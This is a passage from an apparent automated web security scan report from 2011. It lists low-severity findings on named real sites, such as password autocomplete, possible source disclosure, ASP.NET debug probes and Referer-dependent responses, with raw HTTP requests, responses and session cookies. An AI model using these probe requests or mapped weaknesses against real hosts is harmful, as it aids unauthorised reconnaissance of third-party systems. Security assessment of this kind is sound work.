                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.5. http://community.sprint.com/baw/index.jspa previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/index.jspa

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.6. http://community.sprint.com/baw/reviews.jspa previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/reviews.jspa

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /baw/reviews.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:19:04 GMT
Server: Apache-Coyote/1.1
X-JAL: 243
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=366326 t=1315099144439190
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 90192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
       <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
           <fieldset>
...[SNIP]...
<br />
                   <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" maxlength="33"/><br />
...[SNIP]...

13.7. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The page contains a form with the following action URL:

https://www.linkedin.com/secure/login

The form contains the following password field with autocomplete enabled:

session_password

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.8. http://www.sprint.com/index_c.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/index_c.html

Issue detail

The page contains a form with the following action URL:

https://mysprint.sprint.com/entrycheck/login.fcc

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /index_c.html HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=105E1B5AD68B10D605E2BDF5FE0A4306; TLTUID=105E1B5AD68B10D605E2BDF5FE0A4306; Apache=50.23.123.106.1315095358451950; TLisset=true; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; naf=userSeg~Interstitial Home Page; s_sv_sid=203069262488; s_sv_112_p1=1@10@s/6293&e/2; s_sv_112_s1=1@16@a//1315097069380; s_vi=[CS]v1|273164E305162D78-600001A660177E59[CE]; segment_user=consumer; user=xyz%7Cconsumer; s_cc=true; gpv_p37=Home%20Page; gpv_p38=HP%20%3A%20IHP%20%3A%20Sprint%20Home%20Page; s_sq=sprintuniversalsiteprod%3D%2526pid%253DHP%252520%25253A%252520IHP%252520%25253A%252520Sprint%252520Home%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.sprint.com%25252Findex_c.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:34 GMT
Server: Apache/2.2.14 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 41758
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="userLoginContent" class="disclosureContent">
                           <form id="frmUserLogin" name="Login" method="post" action="https://mysprint.sprint.com/entrycheck/login.fcc">
                               <fieldset>
...[SNIP]...
<br />

                                       <input type="password" name="PASSWORD" id="txtLoginPassword" class="text" />
                                   </div>
...[SNIP]...

13.9. https://www.sprint.net/performance/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /performance/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

13.10. https://www.sprint.net/performance/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Issue detail

The page contains a form with the following action URL:

https://www.sprint.net/login

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:32 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

14. Source code disclosure previous next
There are 4 instances of this issue:

/baw/community/buzzaboutwireless
/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support
/baw/community/sprintblogs
/baw/index.jspa

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

14.1. http://community.sprint.com/baw/community/buzzaboutwireless previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /baw/community/buzzaboutwireless HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:45 GMT
Server: Apache-Coyote/1.1
X-JAL: 186
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130313b31342c323130323b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=346147 t=1315099124916508
Connection: close
Content-Length: 138024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.sprint.com
Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:54 GMT
Server: Apache-Coyote/1.1
X-JAL: 270
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=424084 t=1315099134687160
Connection: close
Content-Length: 156782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.3. http://community.sprint.com/baw/community/sprintblogs previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:46 GMT
Server: Apache-Coyote/1.1
X-JAL: 95
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw
Vary: User-Agent,Accept-Encoding
X-JSL: D=222160 t=1315099125905413
Connection: close
Content-Length: 115606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

14.4. http://community.sprint.com/baw/index.jspa previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.sprint.com
Path:	/baw/index.jspa

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /baw/index.jspa HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:18:43 GMT
Server: Apache-Coyote/1.1
X-JAL: 314
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=445807 t=1315099123758151
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 169328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<textarea id="wysiwygtext" rows="10" class="jive-comment-textarea"><%= body %></textarea>
<textarea name="body" rows="10" style="display:none;" class="jive-comment-textarea"><%= body %></textarea>
...[SNIP]...

15. ASP.NET debugging enabled previous next
There are 2 instances of this issue:

http://usata1.gcion.com/Default.aspx
http://www.wisdomtree.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

15.1. http://usata1.gcion.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://usata1.gcion.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:52:45 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15.2. http://www.wisdomtree.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wisdomtree.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wisdomtree.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:20:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16. Referer-dependent response previous next
There are 4 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.youtube.com/embed/xXftjfC3b5o

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Request 1

Response 1

Request 2

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Sun, 04-Sep-2011 00:57:44 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjS8Za2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:44 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

16.2. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.166.57
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 25864

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62cae62d2dd7d90452879" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Notre Dame, Michigan stadiums cleared due to storms</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=reuters.com&placement=like_button&extra_1=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&a
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&layout=standard&show_faces=false&width=450&action=recommend&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.133.44
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:45 GMT
Content-Length: 25652

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e62caeded57a9c58485022" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend <b>Notre Dame, Michigan stadiums cleared due to storms</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_elem"><
...[SNIP]...

16.3. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.143.43
X-Cnection: close
Date: Sun, 04 Sep 2011 01:03:04 GMT
Content-Length: 8338

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<div id="connect_widget_4e62ce4830e8f7027001287" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">466</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span>
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-State-Worker%2F174087795950002&width=292&colorscheme=light&show_faces=false&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.139.47
X-Cnection: close
